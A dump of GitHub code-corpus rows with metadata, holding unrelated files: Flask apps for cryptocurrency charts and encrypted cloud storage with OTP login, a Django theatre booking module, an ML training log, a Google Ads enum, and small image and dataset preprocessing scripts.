blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5cde2b1e9bb942616c7e07c2025138877b9f3999 | f890e1e9a0203c4d17d046467f0e3ba5da63ab11 | /app.py | 9cc0816e5c9ecd06be620bcad205c85f69500cbb | [] | no_license | alexlouf/IPSSI-API-FLASK | db74f623108e5c7a369609e5670a7125a62e49c2 | 70b4e7233a16930fe5e62ec84bc5d03dc6b3db1f | refs/heads/main | 2023-01-01T00:00:47.043710 | 2020-10-23T10:20:36 | 2020-10-23T10:20:36 | 305,372,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,286 | py | import json
import urllib
from flask import Flask, request
from flask import render_template
app = Flask(__name__)
@app.route("/")
def info():
url = "https://api.nomics.com/v1/volume/history?key=demo-26240835858194712a4f8cc0dc635c7a"
result = urllib.request.urlopen(url)
data = json.load(result)
timestamp = []
volume = []
legend = "Volume d'échange quotidien ($)"
for i in data:
timestamp.append(i['timestamp'])
volume.append(i['volume'])
return render_template("index.html", labels=timestamp, values=volume, legend=legend)
@app.route("/prix")
def prix():
coin = request.args.get("coin")
if coin is None:
coin = "BTC";
start = request.args.get("start")
if start is None:
start = "2011-08-18";
end = request.args.get("end")
if end is None:
end = "2020-12-30";
url = "https://api.nomics.com/v1/exchange-rates/history?key=demo-26240835858194712a4f8cc0dc635c7a¤cy="+coin+"&start="+start+"T00%3A00%3A00Z&end="+end+"T00%3A00%3A00Z"
result = urllib.request.urlopen(url)
data = json.load(result)
timestamp = []
price = []
legend = coin+" Price"
for i in data:
timestamp.append(i['timestamp'])
price.append(i['rate'])
return render_template("price.html", labels=timestamp, values=price, legend=legend, coin=coin)
@app.route("/market")
def market():
url = "https://api.nomics.com/v1/market-cap/history?key=demo-26240835858194712a4f8cc0dc635c7a&start=2011-08-18T00%3A00%3A00Z"
result = urllib.request.urlopen(url)
data = json.load(result)
marketcap = []
timestamp = []
legend = "Market CAP"
for i in data:
marketcap.append(i['market_cap'])
timestamp.append(i['timestamp'])
return render_template("market.html", labels=timestamp, values=marketcap, legend=legend)
@app.route("/exchange")
def exchange():
echange = request.args.get("echange")
if echange is None:
echange = "";
url = "https://api.nomics.com/v1/markets?key=demo-26240835858194712a4f8cc0dc635c7a&exchange="+echange+"&base=BTC"
result = urllib.request.urlopen(url)
data = json.load(result)
return render_template("exchange.html", data=data)
if __name__ == "__main__":
app.run(debug=True)
| [
"contact@alexandrelouf.fr"
] | contact@alexandrelouf.fr |
e616bcfb1bf7461887e03e4ec1d91903201621bc | 830acb926cc5cf5a12f2045c8497d6f4aa1c2ef2 | /Tic-Tac-Toe/Problems/Running average/task.py | 6b4d0d43c548fa9085564c710c504a5801f51195 | [] | no_license | BuyankinM/JetBrainsAcademyProjects | ca2223875ea4aab3ee7fceedc8e293bdb6e1fdcf | d5f9fcde4298af714960b2755f762141de796694 | refs/heads/main | 2023-02-26T05:47:26.070972 | 2021-02-03T22:10:53 | 2021-02-03T22:10:53 | 335,762,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | numbers = [int(d) for d in input()]
print([(numbers[i] + numbers[i + 1]) / 2 for i in range(len(numbers) - 1)]) | [
"mbuyankin@gmail.com"
] | mbuyankin@gmail.com |
60bbf34672b90fdcc90a1fafedf288d3d913dd8d | 1b19ff0604d07272299f29fff4cf9b7a84633f60 | /experiments/tuning_nogpu/20units_2.py | 1f2a5d6117430b6b8c8da8fea835d87e9d8482d3 | [
"MIT"
] | permissive | samuilstoychev/research_project | 23cde9147f66b5455c86ed7b5838b264cd457d87 | 897bde82471ef92ded396aa31d91ec19826d4ce2 | refs/heads/main | 2023-05-31T01:56:23.577771 | 2021-06-03T11:15:02 | 2021-06-03T11:15:02 | 343,269,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,149 | py | RAM AT BEGINNING: 0.22320556640625
Latent replay turned on
CUDA is NOT(!!) used
RAM BEFORE LOADING DATA: 0.2279052734375
Preparing the data...
SPLIT RATIO: [50000, 10000]
--> mnist: 'train'-dataset consisting of 60000 samples
--> mnist: 'test'-dataset consisting of 10000 samples
RAM AFTER LOADING DATA: 0.28905487060546875
RAM BEFORE CLASSIFER: 0.28993988037109375
RAM AFTER CLASSIFER: 0.28993988037109375
RAM BEFORE PRE-TRAINING 0.28993988037109375
RAM AFTER PRE-TRAINING 0.31342315673828125
RAM BEFORE GENERATOR: 0.31342315673828125
RAM AFTER DECLARING GENERATOR: 0.31342315673828125
MACs of root classifier 368800
MACs of top classifier: 3840
RAM BEFORE REPORTING: 0.31342315673828125
Parameter-stamp...
--> task: splitMNIST5-task
--> model: CNN_CLASSIFIER_c10
--> hyper-params: i500-lr0.001-b128-adam
--> replay: generative-VAE(MLP([20, 20, 20])--z100-c10)
splitMNIST5-task--CNN_CLASSIFIER_c10--i500-lr0.001-b128-adam--generative-VAE(MLP([20, 20, 20])--z100-c10)-s21857
----------------------------------------TOP----------------------------------------
CNNTopClassifier(
(dropout2): Dropout(p=0.5, inplace=False)
(fc1): Linear(in_features=20, out_features=128, bias=True)
(fc2): Linear(in_features=128, out_features=10, bias=True)
)
------------------------------------------------------------------------------------------
--> this network has 3978 parameters (~0.0 million)
of which: - learnable: 3978 (~0.0 million)
- fixed: 0 (~0.0 million)
------------------------------------------------------------------------------------------
----------------------------------------ROOT----------------------------------------
CNNRootClassifier(
(conv1): Conv2d(1, 10, kernel_size=(5, 5), stride=(1, 1))
(conv2): Conv2d(10, 10, kernel_size=(5, 5), stride=(1, 1))
(dropout1): Dropout(p=0.25, inplace=False)
(fc0): Linear(in_features=1440, out_features=20, bias=True)
)
------------------------------------------------------------------------------------------
--> this network has 31590 parameters (~0.0 million)
of which: - learnable: 31590 (~0.0 million)
- fixed: 0 (~0.0 million)
------------------------------------------------------------------------------------------
----------------------------------------GENERATOR----------------------------------------
AutoEncoderLatent(
(fcE): MLP(
(fcLayer1): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): ReLU()
)
(fcLayer2): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): ReLU()
)
)
(toZ): fc_layer_split(
(mean): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=100)
)
(logvar): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=100)
)
)
(classifier): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=10)
)
(fromZ): fc_layer(
(linear): LinearExcitability(in_features=100, out_features=20)
(nl): ReLU()
)
(fcD): MLP(
(fcLayer1): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): ReLU()
)
(fcLayer2): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): Sigmoid()
)
)
)
------------------------------------------------------------------------------------------
--> this network has 8010 parameters (~0.0 million)
of which: - learnable: 8010 (~0.0 million)
- fixed: 0 (~0.0 million)
------------------------------------------------------------------------------------------
RAM BEFORE TRAINING: 0.31342315673828125
CPU BEFORE TRAINING: (132.48, 3.16)
Training...
PEAK TRAINING RAM: 0.341400146484375
RAM BEFORE EVALUATION: 0.34079742431640625
CPU BEFORE EVALUATION: (860.51, 15.38)
EVALUATION RESULTS:
Precision on test-set:
- Task 1: 0.9642
- Task 2: 0.9967
- Task 3: 0.9840
- Task 4: 0.9879
- Task 5: 0.9918
=> Average precision over all 5 tasks: 0.9849
=> Total training time = 138.8 seconds
RAM AT THE END: 0.33341217041015625
CPU AT THE END: (865.33, 16.44)
| [
"ss2719@cl.cam.ac.uk"
] | ss2719@cl.cam.ac.uk |
8a50cede02f24b38149931891726dd61209e7e8b | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/enums/types/user_list_size_range.py | 0d0e350bd2d3aad1366ab619a5163fc0ab0236ea | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,816 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.enums',
marshal='google.ads.googleads.v6',
manifest={
'UserListSizeRangeEnum',
},
)
class UserListSizeRangeEnum(proto.Message):
r"""Size range in terms of number of users of a UserList."""
class UserListSizeRange(proto.Enum):
r"""Enum containing possible user list size ranges."""
UNSPECIFIED = 0
UNKNOWN = 1
LESS_THAN_FIVE_HUNDRED = 2
LESS_THAN_ONE_THOUSAND = 3
ONE_THOUSAND_TO_TEN_THOUSAND = 4
TEN_THOUSAND_TO_FIFTY_THOUSAND = 5
FIFTY_THOUSAND_TO_ONE_HUNDRED_THOUSAND = 6
ONE_HUNDRED_THOUSAND_TO_THREE_HUNDRED_THOUSAND = 7
THREE_HUNDRED_THOUSAND_TO_FIVE_HUNDRED_THOUSAND = 8
FIVE_HUNDRED_THOUSAND_TO_ONE_MILLION = 9
ONE_MILLION_TO_TWO_MILLION = 10
TWO_MILLION_TO_THREE_MILLION = 11
THREE_MILLION_TO_FIVE_MILLION = 12
FIVE_MILLION_TO_TEN_MILLION = 13
TEN_MILLION_TO_TWENTY_MILLION = 14
TWENTY_MILLION_TO_THIRTY_MILLION = 15
THIRTY_MILLION_TO_FIFTY_MILLION = 16
OVER_FIFTY_MILLION = 17
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
9c802b12bacaad5288ed0d1093da3038b12fd657 | b2755ce7a643ae5c55c4b0c8689d09ad51819e6b | /anuvaad-etl/anuvaad-extractor/document-processor/ocr/diagram/src/services/inpaint.py | c2b1df5cef5d8dcf9849cccd0660a88ebc93b2c7 | [
"MIT"
] | permissive | project-anuvaad/anuvaad | 96df31170b27467d296cee43440b6dade7b1247c | 2bfcf6b9779bf1abd41e1bc42c27007127ddbefb | refs/heads/master | 2023-08-17T01:18:25.587918 | 2023-08-14T09:53:16 | 2023-08-14T09:53:16 | 265,545,286 | 41 | 39 | MIT | 2023-09-14T05:58:27 | 2020-05-20T11:34:37 | Jupyter Notebook | UTF-8 | Python | false | false | 1,496 | py | import numpy as np
import cv2
def get_words(response,page_index):
page_data = response['outputs'][0]['pages'][page_index]
words = []
for para in page_data['regions'][1:]:
for line in para['regions']:
for word in line['regions']:
words.append(word)
return words
def get_border_color(image, box):
points = box['boundingBox']['vertices']
#try :
border = np.concatenate([image[points[0]['y'] , points[0]['x'] : points[1]['x']],\
image[points[1]['y'] : points[2]['y'] , points[1]['x']],\
image[points[2]['y'] , points[3]['x'] : points[2]['x']],\
image[points[0]['y'] : points[3]['y'] , points[3]['x']]
])
#excpet
return np.median(border[:,0]),np.median(border[:,1]),np.median(border[:,2])
def inpaint_image(image,box,color,margin=2):
#try:
points = box['boundingBox']['vertices']
image[points[0]['y'] - margin : points[3]['y'] + margin,points[0]['x'] -margin*2 : points[1]['x'] + margin*2,:] = color
#except:
return image
def heal_image(image_path,boxes,fill=None):
image = cv2.imread(image_path)
for box in boxes:
if fill is None:
border_color = get_border_color(image,box)
image = inpaint_image(image,box,np.array(border_color))
else:
image = inpaint_image(image,box,np.array(fill))
return image
| [
"srihari.nagaraj@tarento.com"
] | srihari.nagaraj@tarento.com |
a908ac1ce5a8bccbbde05156d911b1af85c292e5 | f4eb8eda733e66c7342c93056bb1d6c8da12549c | /Preproc/PreProcDefs/mscoco.py | e8f52da086a9a4ae5618e407f6ddb8d4f0b64a27 | [
"BSD-3-Clause"
] | permissive | clp-research/image_wac | 016ec257edc9e10bce119d12afa45803b4f38dc9 | b3ce45ba951f0d78777bf984fd3748b09bb2ad24 | refs/heads/master | 2021-06-02T22:44:00.133885 | 2016-09-28T08:11:51 | 2016-09-28T08:11:51 | 60,342,270 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | ## MSCOCO
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M')
print '... (MSCOCO)'
print now
with open('PreProcOut/refcoco_splits.json', 'r') as f:
refcoco_splits = json.load(f)
with open('PreProcOut/google_refexp_rexsplits.json', 'r') as f:
grex_splits = json.load(f)
all_coco_files = list(set(chain(*refcoco_splits.values())).union(set(chain(*grex_splits))))
coco_in_train_p = '../Data/Images/MSCOCO/annotations/instances_train2014.json'
with open(coco_in_train_p, 'r') as f:
coco_in = json.load(f)
cocoandf = pd.DataFrame(coco_in['annotations'])
file_df = pd.DataFrame(all_coco_files, columns=['image_id'])
cocoandf_reduced = pd.merge(cocoandf, file_df)
bbdf_coco = cocoandf_reduced[['image_id', 'id', 'bbox', 'category_id']]
bbdf_coco['i_corpus'] = icorpus_code['mscoco']
bbdf_coco.columns = 'image_id region_id bb cat i_corpus'.split()
bbdf_coco = bbdf_coco['i_corpus image_id region_id bb cat'.split()]
with gzip.open('PreProcOut/mscoco_bbdf.pklz', 'w') as f:
pickle.dump(bbdf_coco, f)
| [
"david.schlangen@uni-bielefeld.de"
] | david.schlangen@uni-bielefeld.de |
6f6c3633acc4941bbe891bccd8fe4dd6d7209c32 | 586c1a106e655a9e448238f6ee8cd061316c136b | /auth.py | 1d40671d2456911f5a5e03a53137a9da350e8ae0 | [] | no_license | tanvipenumudy/Secure-AWS-Storage | 049c9c115ca1b83d4c3c9b39bc7064df04a8b5fa | 173fb38a6450d42850c294f843f9af597f0945e1 | refs/heads/main | 2023-01-24T12:28:45.684299 | 2020-11-22T18:33:43 | 2020-11-22T18:33:43 | 315,098,808 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,786 | py | from werkzeug.security import generate_password_hash, check_password_hash
from flask import Blueprint, render_template, redirect, url_for, request, flash, send_file, Response
from flask_mail import Mail, Message
from app import db
from flask_login import login_user
from models import User
from flask_login import login_user, logout_user, login_required, current_user
from flask import Markup
from Crypto import Random
from Crypto.Cipher import AES
from werkzeug.utils import secure_filename
import os
import random
import string
import os.path
import hashlib
import smtplib
import datetime
from resources import get_bucket, get_buckets_list
from app import app
auth = Blueprint('auth', __name__)
app_root = os.path.dirname(os.path.abspath(__file__))
app.config["MAIL_SERVER"]='smtp.gmail.com'
app.config["MAIL_PORT"] = 465
app.config["MAIL_USERNAME"] = 'e-mail'
app.config['MAIL_PASSWORD'] = 'password'
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
def pad(s):
return s + b"\0" * (AES.block_size - len(s) % AES.block_size)
def encrypt(message, key, key_size=256):
message = pad(message)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CBC, iv)
return iv + cipher.encrypt(message)
def decrypt(ciphertext, key):
iv = ciphertext[:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(ciphertext[AES.block_size:])
return plaintext.rstrip(b"\0")
def encrypt_file(file_name, key):
with open(file_name, 'rb') as fo:
plaintext = fo.read()
enc = encrypt(plaintext, key)
with open(file_name + ".enc", 'wb') as fo:
fo.write(enc)
def decrypt_file(file_name, key):
with open(file_name, 'rb') as fo:
ciphertext = fo.read()
dec = decrypt(ciphertext, key)
with open(file_name[:-4], 'wb') as fo:
fo.write(dec)
@auth.route('/login')
def login():
return render_template('login.html')
@auth.route('/signup')
def signup():
return render_template('signup.html')
@auth.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('index'))
@auth.route('/signup',methods=['POST'])
def signup_post():
email = request.form.get('email')
name = request.form.get('name')
password = request.form.get('password')
if(email == '' or name == '' or password == ''):
flash('Please enter all the fields.')
return redirect(url_for('auth.signup'))
user = User.query.filter_by(email=email).first()
if(user):
flash(Markup('Email address already exists. Please go to <a href="http://127.0.0.1:5000/login" class="alert-link">Login Page</a>'))
return redirect(url_for('auth.signup'))
otp = random.randint(100000,999999)
msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'e-mail', recipients = [email])
msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
mail.send(msg)
registered_on = datetime.datetime.now()
new_user = User(email=email, name=name, otp=otp, registered_on=registered_on, password=generate_password_hash(password, method='sha256'),keydir="{}")
# add the new user to the database
db.session.add(new_user)
db.session.commit()
return redirect(url_for('auth.validate', email=email))
@auth.route('/validate/<email>',methods=["GET","POST"])
def validate(email):
if(request.method == 'GET'):
return render_template('validate.html', email=email)
else:
from app import current_user
user = User.query.filter_by(email=email).first()
otp = user.otp
user_otp = request.form['otpcode']
if(user_otp == ''):
flash('OTP field is left blank.')
return redirect(url_for('auth.validate', email=email))
if(str(otp) == user_otp):
c = datetime.datetime.now() - user.registered_on
if((c.total_seconds()/60) > 5):
flash('Your OTP has expired!')
return redirect(url_for('auth.validate', email=email))
else:
user.verified = True
db.session.commit()
flash('Congrats! Your account has been Verified!')
return redirect(url_for('auth.login'))
flash('Please Enter the Correct OTP!')
return redirect(url_for('auth.validate', email=email))
@auth.route('/generate/<email>')
def generate(email):
user = User.query.filter_by(email=email).first()
otp = random.randint(100000,999999)
msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'tanvi6145@gmail.com', recipients = [email])
msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
mail.send(msg)
user.otp = otp
user.registered_on = datetime.datetime.now()
db.session.commit()
flash('OTP has been resent')
return redirect(url_for('auth.validate', email=email))
@auth.route('/validate1/<email>',methods=["GET","POST"])
def validate1(email):
if(request.method == 'GET'):
return render_template('validate1.html', email=email)
else:
from app import current_user
user = User.query.filter_by(email=email).first()
otp = user.otp
user_otp = request.form['otpcode']
if(user_otp == ''):
flash('OTP field is left blank.')
return redirect(url_for('auth.validate1', email=email))
if(str(otp) == user_otp):
c = datetime.datetime.now() - user.registered_on
if((c.total_seconds()/60) > 5):
flash('Your OTP has expired!')
return redirect(url_for('auth.validate1', email=email))
else:
user.verified = True
db.session.commit()
flash('Congrats! Your account has been Verified!')
return redirect(url_for('auth.pasw', email=email))
flash('Please Enter the Correct OTP!')
return redirect(url_for('auth.validate1', email=email))
@auth.route('/generate1/<email>')
def generate1(email):
user = User.query.filter_by(email=email).first()
otp = random.randint(100000,999999)
msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'tanvi6145@gmail.com', recipients = [email])
msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
mail.send(msg)
user.otp = otp
user.registered_on = datetime.datetime.now()
db.session.commit()
flash('OTP has been resent')
return redirect(url_for('auth.validate1', email=email))
@auth.route('/login', methods=['POST'])
def login_post():
email = request.form.get('email')
password = request.form.get('password')
remember = True if request.form.get('remember') else False
user = User.query.filter_by(email=email).first()
if not user or not check_password_hash(user.password, password):
flash('Please check your login details and try again!')
return redirect(url_for('auth.login'))
if(user.verified!= True):
flash('Please Verify your Email!')
return redirect(url_for('auth.validate', email=email))
login_user(user, remember=remember)
return redirect(url_for('profile'))
@auth.route('/mail1', methods=["GET","POST"])
def mail1():
if(request.method == 'GET'):
return render_template('mail1.html')
else:
email = request.form.get('email')
if(email == ''):
flash('Email field is left blank.')
return redirect(url_for('auth.mail1'))
user = User.query.filter_by(email=email).first()
otp = random.randint(100000,999999)
msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'tanvi6145@gmail.com', recipients = [email])
msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
mail.send(msg)
user.otp = otp
user.registered_on = datetime.datetime.now()
db.session.commit()
flash('OTP has been sent')
return redirect(url_for('auth.validate1', email=email))
@auth.route('/pasw/<email>', methods=["GET", "POST"])
def pasw(email):
from app import current_user
if(request.method == 'GET'):
return render_template('pasw.html')
else:
new_psw = request.form.get('password')
con_psw = request.form.get('confirmpass')
if(new_psw == '' or con_psw == ''):
flash('Password field is left blank.')
return redirect(url_for('auth.set2'))
if(new_psw != con_psw):
flash('Passwords do not match')
return redirect(url_for('auth.set2'))
passhash = generate_password_hash(new_psw, method='sha256')
user = User.query.filter_by(email=email).first()
user.password = passhash
try:
db.session.commit()
except:
flash('Technical error, failed to update')
return redirect(url_for('auth.pasw'))
flash('Successfully Updated!')
return redirect(url_for('auth.login'))
@auth.route('/dele')
@login_required
def dele():
return render_template('dele.html')
@auth.route('/account_set')
@login_required
def account_set():
return render_template('settings.html')
@auth.route('/set1', methods=["GET", "POST"])
@login_required
def set1():
from app import current_user
if(request.method == 'GET'):
return render_template('setting1.html')
else:
new_email = request.form.get('email')
if(new_email == ''):
flash('Email field is left blank.')
return redirect(url_for('auth.set1'))
user = User.query.get_or_404(current_user.id)
user.email = new_email
try:
db.session.commit()
except:
flash('Technical error, failed to update')
return redirect(url_for('auth.set1'))
flash('Successfully Updated!')
return redirect(url_for('auth.set1'))
@auth.route('/set2', methods=["GET", "POST"])
@login_required
def set2():
from app import current_user
if(request.method == 'GET'):
return render_template('setting2.html')
else:
new_psw = request.form.get('password')
con_psw = request.form.get('confirmpass')
if(new_psw == '' or con_psw == ''):
flash('Password field is left blank.')
return redirect(url_for('auth.set2'))
if(new_psw != con_psw):
flash('Passwords do not match')
return redirect(url_for('auth.set2'))
passhash = generate_password_hash(new_psw, method='sha256')
user = User.query.get_or_404(current_user.id)
user.password = passhash
try:
db.session.commit()
except:
flash('Technical error, failed to update')
return redirect(url_for('auth.set2'))
flash('Successfully Updated!')
return redirect(url_for('auth.set2'))
@auth.route('/cancel account')
def cancel():
from app import current_user
if current_user is None:
return redirect(url_for('index'))
try:
db.session.delete(current_user)
db.session.commit()
except:
return 'unable to delete the user.'
flash('Your account has been deleted')
return redirect(url_for('auth.login'))
@auth.route('/enc_upload', methods=['POST'])
@login_required
def enc_upload():
from app import current_user
user = User.query.get_or_404(current_user.id)
source = os.path.join(app_root,'uploads')
if(not os.path.exists(source)):
os.makedirs(source)
target = os.path.join(app_root, 'encrypted')
if(not os.path.exists(target)):
os.makedirs(target)
file = request.files['file']
if(file.filename==''):
flash('No file selected')
if(file):
loc0 = os.path.join(source,file.filename)
file.save(loc0)
loc = os.path.join(target,file.filename+".enc")
with open(loc0, 'rb') as fo:
plaintext = fo.read()
res = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 20))
res1 = bytes(res, 'utf-8')
key = hashlib.sha256(res1).digest()
enc = encrypt(plaintext, key)
with open(loc, 'wb') as fo:
fo.write(enc)
my_bucket = get_bucket()
my_bucket.Object(file.filename+".enc").put(Body=open(loc,'rb'))
source1 = os.path.join(app_root, 'keys')
if(not os.path.exists(source1)):
os.makedirs(source1)
source2 = os.path.join(source1, file.filename+".enc key.txt")
keydir = eval(user.keydir)
keydir[file.filename+".enc"] = key
user.keydir = str(keydir)
db.session.commit()
with open(source2, "w") as file1:
file1.write(res)
file1.close()
flash('File uploaded successfully')
return send_file(source2, as_attachment=True)
return redirect(url_for('files'))
@auth.route('/upload', methods=['POST'])
@login_required
def upload():
file = request.files['file']
if(file.filename==''):
flash('No file selected')
if(file):
my_bucket = get_bucket()
my_bucket.Object(file.filename).put(Body=file)
flash('File uploaded successfully')
return redirect(url_for('files'))
@auth.route('/delete', methods=['POST'])
@login_required
def delete():
key = request.form['key']
my_bucket = get_bucket()
my_bucket.Object(key).delete()
flash('File deleted successfully')
return redirect(url_for('files'))
@auth.route('/download', methods=['POST'])
@login_required
def download():
from app import current_user
user = User.query.get_or_404(current_user.id)
key = request.form['key']
if('.enc' == key[-4:]):
user.download = key
db.session.commit()
return redirect(url_for('auth.download1'))
elif('.enc' != key[-4:]):
my_bucket = get_bucket()
file_obj = my_bucket.Object(key).get()
return Response(
file_obj['Body'].read(),
mimetype='text/plain',
headers={"Content-Disposition": "attachment;filename={}".format(key)}
)
@auth.route('/download1')
@login_required
def download1():
return render_template('download1.html')
@auth.route('/download1', methods=['POST'])
@login_required
def download1_post():
from app import current_user
seckey = request.form['seckey']
seckey = bytes(seckey, 'utf-8')
seckey = hashlib.sha256(seckey).digest()
user = User.query.get_or_404(current_user.id)
key = user.download
keydir = eval(user.keydir)
source = os.path.join(app_root,'uploads')
if(keydir[key]==seckey):
loc0 = os.path.join(source,key[:-4])
# flash('Your Download is Ready!')
return send_file(loc0, as_attachment=True)
else:
flash('Please Enter the Correct Key')
return redirect(url_for('auth.download1'))
| [
"noreply@github.com"
] | tanvipenumudy.noreply@github.com |
b606b3dc678ce2db8c05942a074cf21356cde599 | 0700ad1f938076f48fe7cc0ea6883d30251ed69d | /booking/views.py | fa191b235f2727e29e1dede09888ea8cd92b9a94 | [] | no_license | gskansarag/theatre_project | 5d8b10c4dd5dd530ca561cb255172828004cb4c8 | 882c3fbb6dfe96284212c2a71165d94c89f24e21 | refs/heads/master | 2020-07-26T06:53:47.061484 | 2019-09-15T09:34:48 | 2019-09-15T09:34:48 | 208,569,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,896 | py | from django.shortcuts import render, get_object_or_404
from myapp.models import Booking, BookedSeat, Seat
from myapp.models import Show
from myapp.forms import SeatForm, BookingForm
from django.urls import reverse_lazy
#from django.views.generic import CreateView
import datetime
from django.views.generic import ListView,DetailView,DeleteView
from myapp.models import Theatre
from django.shortcuts import redirect
from django.http.response import Http404
# Create your views here.
def reserve_seat(request, show_id):
try:
show_info = Show.objects.get(pk=show_id)
except Theatre.DoesNotExist:
raise Http404("Page does not exist")
form = SeatForm()
return render(request, 'reserve_seat.html',
{'show_info': show_info, 'form': form})
def payment_gateway(request):
if request.POST:
seats = request.POST.get('selected_seat')
seat_type = request.POST.get('seat_type')
show_id = request.POST.get('show_id')
show = Show.objects.get(pk=show_id)
seats = seats.split(',')
book_seat = []
for each in seats:
if Seat.objects.filter(no=each, show=show).exists():
return render(request, 'reserve_seat.html',
{'show_info': show, 'form': SeatForm()})
s = Seat(no=each, seat_type=seat_type, show=show)
book_seat.append(s)
Seat.objects.bulk_create(book_seat)
form = BookingForm()
price_dict = {'Platinum': 300, 'Gold': 200, 'Silver': 100}
ticket_price = price_dict[seat_type]*len(book_seat)
seat_str = ""
for i in range(0, len(seats)):
if i == len(seats)-1:
seat_str += seats[i]
else:
seat_str += seats[i] + ','
return render(request, 'payment_gateway.html',
{'seats': seat_str, 'seat_type': seat_type,
'show': show, 'form': form, 'ticket_price': ticket_price})
else:
return redirect('theatre.views.theatre_list')
def payment_confirmation(request):
if request.POST:
show_id = request.POST.get('show_id')
show = Show.objects.get(pk=show_id)
seats = request.POST.get('selected_seat')
seats = seats.split(',')
timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
payment_type = request.POST.get('payment_type')
paid_amount = request.POST.get('amount')
paid_by = request.user
id = str(show) + str(seats) + timestamp
book = Booking(id=id, timestamp=timestamp, payment_type=payment_type,
paid_amount=paid_amount, paid_by=paid_by)
book.save()
booked_seat = []
for seat in seats:
print(seat)
s = Seat.objects.get(no=seat, show=show)
b = Booking.objects.get(pk=id)
booked = BookedSeat(seat=s, booking=b)
booked_seat.append(booked)
BookedSeat.objects.bulk_create(booked_seat)
return render(request, 'payment_confirmation.html')
else:
return redirect('theatre.views.theatre_list')
class BookingListView(ListView):
def get_queryset(self):
return Booking.objects.filter(paid_by=self.request.user)
class BookingDetailView(DetailView):
def get_queryset(self):
return Booking.objects.filter(paid_by=self.request.user)
def get_object(self,*args,**kwargs):
btid = self.kwargs.get('btid')
obj = get_object_or_404(Booking,id=btid)
return obj
class BookingDeleteView(DeleteView):
model = Booking
success_url = reverse_lazy('booking:list')
def get_object(self,*args,**kwargs):
btid = self.kwargs.get('btid')
obj = get_object_or_404(Booking,id=btid)
return obj
| [
"noreply@github.com"
] | gskansarag.noreply@github.com |
